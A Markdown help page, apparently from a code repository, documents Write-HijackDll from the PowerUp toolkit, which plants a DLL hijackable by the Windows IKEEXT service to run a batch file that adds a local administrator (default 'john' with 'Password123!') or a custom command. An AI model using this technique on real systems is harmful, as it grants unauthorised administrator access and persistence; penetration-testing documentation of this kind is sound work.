blob: d38e3e73ca0397ef13ae38279f2dc7b4d109fb09 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
|
# Write-HijackDll
## SYNOPSIS
Patches in the path to a specified .bat (containing the specified command) into a
pre-compiled hijackable C++ DLL writes the DLL out to the specified ServicePath location.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
## SYNTAX
```
Write-HijackDll [-DllPath] <String> [[-Architecture] <String>] [[-BatPath] <String>] [[-UserName] <String>]
[[-Password] <String>] [[-LocalGroup] <String>] [[-Credential] <PSCredential>] [[-Command] <String>]
```
## DESCRIPTION
First builds a self-deleting .bat file that executes the specified -Command or local user,
to add and writes the.bat out to -BatPath.
The BatPath is then patched into a pre-compiled
C++ DLL that is built to be hijackable by the IKEEXT service.
There are two DLLs, one for
x86 and one for x64, and both are contained as base64-encoded strings.
The DLL is then
written out to the specified OutputFile.
## EXAMPLES
### Example 1
```
PS C:\> {{ Add example code here }}
```
{{ Add example description here }}
## PARAMETERS
### -DllPath
File name to write the generated DLL out to.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: True
Position: 1
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -Architecture
The Architecture to generate for the DLL, x86 or x64.
If not specified, PowerUp
will try to automatically determine the correct architecture.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: 2
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -BatPath
Path to the .bat for the DLL to launch.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: 3
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -UserName
The \[domain\\\]username to add.
If not given, it defaults to "john".
Domain users are not created, only added to the specified localgroup.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: 4
Default value: John
Accept pipeline input: False
Accept wildcard characters: False
```
### -Password
The password to set for the added user.
If not given, it defaults to "Password123!"
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: 5
Default value: Password123!
Accept pipeline input: False
Accept wildcard characters: False
```
### -LocalGroup
Local group name to add the user to (default of 'Administrators').
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: 6
Default value: Administrators
Accept pipeline input: False
Accept wildcard characters: False
```
### -Credential
A \[Management.Automation.PSCredential\] object specifying the user/password to add.
```yaml
Type: PSCredential
Parameter Sets: (All)
Aliases:
Required: False
Position: 7
Default value: [Management.Automation.PSCredential]::Empty
Accept pipeline input: False
Accept wildcard characters: False
```
### -Command
Custom command to execute instead of user creation.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: 8
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
## INPUTS
## OUTPUTS
### PowerUp.HijackableDLL
## NOTES
## RELATED LINKS
|